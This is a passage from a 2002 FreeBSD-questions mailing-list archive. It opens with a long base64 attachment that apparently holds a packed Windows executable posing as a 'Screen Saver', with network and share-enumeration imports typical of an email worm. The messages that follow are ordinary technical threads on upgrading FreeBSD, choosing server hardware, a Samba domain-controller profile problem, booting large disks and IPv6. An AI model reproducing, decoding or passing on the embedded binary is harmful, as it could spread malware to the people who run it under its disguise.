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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAL/GYRk8QB0MyVcZyjvdAcSK9nF5kl4i0qxLgBKB8lVNFQ+jl81VRwBGKgoZggOk9SNpLPLEA OWxS9nRpwsNHrluYU3FXk1/bb/C7TUXjwOMAVJA4VKIdPjLQ6VOewLjAzpxM9bjVcbDs8me/iyY/ 1ImzXUI7KJbSbjAMMsmnKgb33jEi0n0RLABjOMbtmgp4gzd2rwG3UqYhjHzYXev1vHyFJh4QOCOB bCOwRN7kVzt493FbxXWNNIbaraTzNfNy2HhRcXDd54TYlUrjXKyeewvGzq5e1ZkI1g30cgZcMl/V SJJIg3D4U0sBKrsC95t78Q3fZy13PpCalouKR3JU5j5dlQtfRk++jB5qUuYGfaIiCc7UG1KiOkjG SJ9b1+5Z6bMJ0MnAIrrSl/CR5y/GKnqAtajAeyxRbYkbCTUPbs7tKUgHOJwmJxTUhvdjHlVXDFBF Cy0ppFS2j7pSjMMrsV0eq5133D/dqNrUg0OyUkfqpDq3NvhAevhHj7Wt+RAaXeZF8xuXx6vvZzyN HAYuOW2fOMMqunIVFsoe0mEBRTQ0ZPIFWyxkQjnm+d8fS/BOxgWB591ZFG/x947SMg9OFE4rrPnS FiZ6B65j9vkYpphma1EX9ulUz7pc7TsFzDTuAMP53+JaUQUPmk2BDCUBRery1vWADrA6fEkYE6cq 8q7yH2XMZr6mh/RShtdLXMdFz6rSdjVB9QeGuOjhORtcj8UYRZHluBeohSLKsjD4UrXEGSQncmV/ TDJN55GOCUdXNCjBZIidFR+0QqUu7FglibmuWtzxgboZ5Z6BqxxL1TwioOTz9BZdZ2ZYZSkvCDCp baHsHV/tmoo2qfcc5LTO8256gmReKekQsfY6oS7ryxDWmCTMrCdfo7R2ehyAI/iSE09oZ9HHS67i XS9A9AKEqigxEjCP1Il8FI3yqynI0c9QjgARoV8btRWCQCrtn1c2XLPCOlkLCPFAMToal/PJrz9p vdPpjXe0s/j5zUAvlarjHgYc5ds2CAOJBh5DYwn4QZft0WTw0vg5WR1Zm2fotPkTcJ6cspWvazam Cxa/r1utso+JOZ4K6SKGDystOz85Ku+aEpwdNqqZtq6RrReUtPb1r95N0isXIYHySNS/CN/l+c0d du1JAa1RGNUztK2p33vkZAPntpjotAERKVjQVeD3V9lsQoRo8MwQqV4VSu3h9ADtfI1102R7Hmop p61dxIMmCmZH2azL6l8Pk8gdMO+3RcxRl4gwTcszu21XDaFs4Rqtr3iolrflzZ/Xyj4Ty/Uv48Ek j73aXrTjRouYnMML72t4fZneO+bfbptIDyZyksKXhII3uR2CNh2KaWECyM9NRCthsEgTqAoSAYQ7 C/QfAIwfL9JsJ4AXNKZzykmch46yMiRGacqseoPX --elgxpud-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12: 8:51 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.ufficiopostale.it (servizi.interazioni.it [194.183.4.167]) by hub.freebsd.org (Postfix) with SMTP id 0A62537B4BD for ; Sun, 23 Jun 2002 12:07:48 -0700 (PDT) Received: (qmail 94911 invoked by uid 85); 23 Jun 2002 19:07:55 -0000 Received: from tonix@interazioni.it by avsmtp.ufficiopostale.it by uid 88 with qmail-scanner-1.12 (nod32: 1.272 (20020621)/. Clear:. Processed in 0.263774 secs); 23 Jun 2002 19:07:55 -0000 X-Qmail-Scanner-Mail-From: tonix@interazioni.it via avsmtp.ufficiopostale.it X-Qmail-Scanner: 1.12 (Clear:. Processed in 0.263774 secs) Received: from unknown (HELO NATIARM1.interazioni.it) (tonix@interazioni.it@62.98.204.26) by xsmtp.ufficiopostale.it with DES-CBC3-SHA encrypted SMTP; 23 Jun 2002 19:07:54 -0000 Message-Id: <5.1.1.6.0.20020623210112.0466ae98@pop.ufficiopostale.it> X-Sender: tonix@interazioni.it@pop.ufficiopostale.it X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Sun, 23 Jun 2002 21:06:10 +0200 To: freebsd-reply@akruijff.dds.nl From: "tonix (Antonio Nati)" Subject: Re: Upgrading from 4.0 to 4.6 Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: <628414168.20020623141837@dds.nl> References: <5.1.1.6.0.20020621143524.00a71a08@pop.ufficiopostale.it> <5.1.1.6.0.20020621143524.00a71a08@pop.ufficiopostale.it> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 23/06/2002 23/06/2002 +0200, Alex wrote: >tAN> May anyone suggest if this plan may works, or suggest me different paths? >tAN> A) Backup old system (megatar.tar.Z) >tAN> B) Create new system, with minimal FreeBSD 4.0 installation, creation of >tAN> all disks, etc... >tAN> C) Restore of megatar.tar.z in new system > >You will at lease use a image tool not an archive tool. Check out dd >or ghost (windows). And it would only work if you got the same kind of >hardware on the system. (I have had no experience with dd.) Since its >new hardware you have nothing to lose. > >If it works you have the same system on the new hardware. Do a make >world just in case there are minor problems. I understand what you mean, but I prefer to avoid dd or such. I don't need to create boot record or devices, because I want to do that with the first minimal installation. New hardware has new devices, so I must make a first minimal installation to create and use them. (I've forgotten to say that I exclude /dev from the megatar.tar.Z). Thanks anyway, Tonino To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12:11:55 2002 Delivered-To: freebsd-questions@freebsd.org Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by hub.freebsd.org (Postfix) with ESMTP id 9DA4F37B403 for ; Sun, 23 Jun 2002 12:11:46 -0700 (PDT) Received: from [192.168.1.100] ([24.126.181.111]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020623191146.JYGG1547.sccrmhc02.attbi.com@[192.168.1.100]> for ; Sun, 23 Jun 2002 19:11:46 +0000 User-Agent: Microsoft-Entourage/9.0.2509 Date: Sun, 23 Jun 2002 12:13:01 -0700 Subject: [OFF] Pentium vs Athlon which is better From: Steve Warwick To: Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi all, Since I received a bunch of helpful responses to my last question I though I would try one more before I go off and build. Pentium vs Athlon: Building a generic PC system as a webserver (Apache/PHP/MySQL/Email), paying attention to the FreeBSD Hardware Compatibility List, would anyone care to venture their opinion as to which processor is better? As an addendum, any opinion on components? [motherboard, ram, HD, NIC etc] Thanks to all for their helpful input. Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12:26:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp02.wxs.nl (smtp02.wxs.nl [195.121.6.54]) by hub.freebsd.org (Postfix) with ESMTP id 130D237B42C for ; Sun, 23 Jun 2002 12:25:11 -0700 (PDT) Received: from cybertron.kruijff ([213.10.151.186]) by smtp02.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id GY6B9X01.X7I; Sun, 23 Jun 2002 21:25:09 +0200 Date: Sun, 23 Jun 2002 21:25:59 +0200 From: Alex X-Mailer: The Bat! (v1.53d) Reply-To: freebsd-reply@akruijff.dds.nl X-Priority: 3 (Normal) Message-ID: <4934056590.20020623212559@dds.nl> To: Jens Rehsack Cc: Peter Ulrich Kruppa , questions@freebsd.org Subject: Re[2]: fascinating SAMBA-PDC problem In-Reply-To: <3D14C1C4.49F8867F@liwing.de> References: <20020622184124.W13276-100000@small.pukruppa.de> <3D14C1C4.49F8867F@liwing.de> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Dear Jens, Saturday, June 22, 2002, 8:28:20 PM, you wrote: JR> Peter Ulrich Kruppa wrote: >> >> On Sat, 22 Jun 2002, Jens Rehsack wrote: >> > Peter Ulrich Kruppa wrote: >> > > I am experimenting with my small home network to find out how to >> > > set up my Samba server as primary domain controller (PDC) for my >> > > Win2kPro system. >> > > >> > > Later - in real life - the PDC should be able to manage about 800 >> > > user accounts for 30 or 40 NT4 and Win2k machines. >> > > >> > > But back to my home problem: >> > > I was able to give a machine account to my Win2k computer, >> > > integrate it into my domain and create a domain-admin called >> > > root, which is identical to my server's root. >> > > root can log in and out, his profile is downloaded and uploaded >> > > to the server. >> > > Then I set up user accounts (with /stand/sysinstall and >> > > smbpasswd). >> > > When I try to log into these accounts from Win2k they seem to be >> > > authenticated, but after some seconds I receive an error, saying >> > > that the profile couldn't be downloaded and that the access is >> > > denied. >> > > >> > > Any ideas what could be done? >> > >> > There is a solution for this problem which is detailed described in samba >> > documentation and has to do with w2ksp2 and access control list. >> > Please do a "make patch" in /usr/ports/net/samba and search for some >> > documentation 'bout w2k, updates and so on ... >> Hmm, ..., yes I found it. >> They said, this was solved with samba2.2.5, so I >> installed the latest port: but the problem stayed. >> Out of an intuition I copied root's working profile and chown'ed >> it to another registered user. And he could log in. >> >> How this? Did I miss anything? JR> did you add "nt acl support = no" to your smb.conf? JR> I don't read sth. 'bout 2.2.5 in work/samba-2.2.5/docs/README.Win2kSP2 JR> but about 2.2.2. I came across this in a plain text file of samba 2.2.5 some where: 2.2.x - Integration with native Windows server management tools, including user account management and share management. 3.0 - "Domain Controller" - able to serve as a Windows NT PDC. Unicode on the wire support. X.XX - "Full Domain Integration" - allowing both PDC and BDC modes. -- Best regards, Alex The FreeBSD handbook www.freebsd.org/handbook The mailing lists http://www.freebsd.org/support.html#mailing-list How to get best results from the FreeBSD- questions mailing list http://www.freebsd.org/doc/en_US.ISO8859-1/articles/freebsd-questions/index.html Alternative: http://www.lemis.com/questions.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12:27:55 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kanga.honeypot.net (kanga.honeypot.net [208.162.254.122]) by hub.freebsd.org (Postfix) with ESMTP id 5E1FD37B401 for ; Sun, 23 Jun 2002 12:27:49 -0700 (PDT) Received: from pooh.int (mail@pooh.int [10.0.1.2]) by kanga.honeypot.net (8.12.3/8.12.3) with ESMTP id g5NJRggg004325 for ; Sun, 23 Jun 2002 14:27:43 -0500 (CDT) (envelope-from kirk@strauser.com) Received: from kirk by pooh.int with local (Exim 3.35 #1 (Debian)) id 17MD1S-0000IA-00 for ; Sun, 23 Jun 2002 14:27:42 -0500 To: freebsd-questions@freebsd.org Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? References: From: Kirk Strauser Date: 23 Jun 2002 14:27:42 -0500 In-Reply-To: Message-ID: <87u1ntsslt.fsf@pooh.int> Lines: 24 X-Mailer: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 2002-06-23T08:43:48Z, Steve Warwick writes: > Which, in your opinion would make a better server. Sun UltrSparc 5 / > 333mhz running Solaris (I got a great deal on a couple of machines) or a > generic Athlon 1.2mhz running FreeBSD. [both machines have ATA drives & > 256meg] As other posters have said, it really depends on what services you wish to run. Having said that, a given application compiled from source on each box would most likely run faster on the FreeBSD server. Why? Because Solaris' fine-grained kernel locking makes for tremendously powerful 32-way servers, but really takes a bit out of single-CPU performance. Also, while I have tremendous respect for Sparc CPUs, an Athlon at four times the clock speed will probably move quite a few more instructions per second. To be objective, though, you'll really need to try your applications on both systems. Use the one that works the best after you've evaluated it in *your* environment. -- Kirk Strauser The Strauser Group - http://www.strausergroup.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12:48:25 2002 Delivered-To: freebsd-questions@freebsd.org Received: from starbug.ugh.net.au (starbug.ugh.net.au [203.31.238.37]) by hub.freebsd.org (Postfix) with ESMTP id C3D8937B401 for ; Sun, 23 Jun 2002 12:48:21 -0700 (PDT) Received: by starbug.ugh.net.au (Postfix, from userid 1000) id 4BBB7A809; Mon, 24 Jun 2002 05:48:20 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by starbug.ugh.net.au (Postfix) with ESMTP id 4A375542D; Mon, 24 Jun 2002 05:48:20 +1000 (EST) Date: Mon, 24 Jun 2002 05:48:20 +1000 (EST) From: Andrew To: Bob Bomar Cc: questions@freebsd.org Subject: Re: Booting off Large Drives In-Reply-To: <20020623052232.GA18799@peitho.fxp.org> Message-ID: <20020624054417.K32630-100000@starbug.ugh.net.au> X-WonK: *wibble* MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 23 Jun 2002, Bob Bomar wrote: > If this was a BIOS problem, which I had a while ago with a 40 gig > in a P166, then the BIOS would not even see the drive. Well I tried writing out the partitions again and everything worked fine this time around...no idea what I did wrong last time. Thanks for your help, Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12:50:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from priv-edtnes27.telusplanet.net (defout.telus.net [199.185.220.240]) by hub.freebsd.org (Postfix) with ESMTP id BBE7537B40C for ; Sun, 23 Jun 2002 12:50:18 -0700 (PDT) Received: from gcooper ([209.107.108.123]) by priv-edtnes27.telusplanet.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with SMTP id <20020623195018.FBGO17614.priv-edtnes27.telusplanet.net@gcooper> for ; Sun, 23 Jun 2002 13:50:18 -0600 Message-ID: <001c01c21af6$a2acb620$7b6c6bd1@ab.hsia.telus.net> From: "Grant Cooper" To: "freebsd-questions" References: Subject: IPv6,IPv4,RA server - what are these Date: Sun, 23 Jun 2002 14:43:30 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am using telus ADSL, and have it working. But I would like to know a little more about what I did. I am connecting to a hub that connect's to a 3 come HomeConnect Modem that connect's to ???? I did some reading and figured I was connecting to an RA server IPv6- I didn't know but I said yes IPv4 - private local network, I don't think I needed this so I said no DHCP - wasn't sure, but I said yes. So, I didn't really now what IPv6 and IPv4 are? I figure they are network protocols? DHCP - I am sure that I want to connect to the server. Last question is RA servr. The ADSL modem could connect to this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12:51:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from starbug.ugh.net.au (starbug.ugh.net.au [203.31.238.37]) by hub.freebsd.org (Postfix) with ESMTP id E307637B400 for ; Sun, 23 Jun 2002 12:51:35 -0700 (PDT) Received: by starbug.ugh.net.au (Postfix, from userid 1000) id 23375A809; Mon, 24 Jun 2002 05:51:35 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by starbug.ugh.net.au (Postfix) with ESMTP id 20869542D; Mon, 24 Jun 2002 05:51:35 +1000 (EST) Date: Mon, 24 Jun 2002 05:51:35 +1000 (EST) From: Andrew To: Scott Mitchell Cc: Bob Bomar , Subject: Re: Booting off Large Drives In-Reply-To: <20020623104420.D359@fishballoon.dyndns.org> Message-ID: <20020624054913.H32630-100000@starbug.ugh.net.au> X-WonK: *wibble* MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 23 Jun 2002, Scott Mitchell wrote: > You're not trying to boot from a partition beyond the first 1024 cylinders > of the disk, are you? A lot of older machines had issues with this (see No my root partition was at the very start of the disk and small enough (although the slice probably extended past that mark). I wrote out the partitions again and it all worked so I must have stuffed up last time. Thanks for you help, Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 13: 7: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from midway.uchicago.edu (midway.uchicago.edu [128.135.12.12]) by hub.freebsd.org (Postfix) with ESMTP id B2EF837B400 for ; Sun, 23 Jun 2002 13:06:59 -0700 (PDT) Received: from Yggdrasil (adsl-68-20-39-162.dsl.chcgil.ameritech.net [68.20.39.162]) by midway.uchicago.edu (8.12.2/8.12.2) with ESMTP id g5NK6wDT005259; Sun, 23 Jun 2002 15:06:58 -0500 (CDT) Content-Type: text/plain; charset="iso-8859-1" From: David Syphers Reply-To: dsyphers@uchicago.edu To: 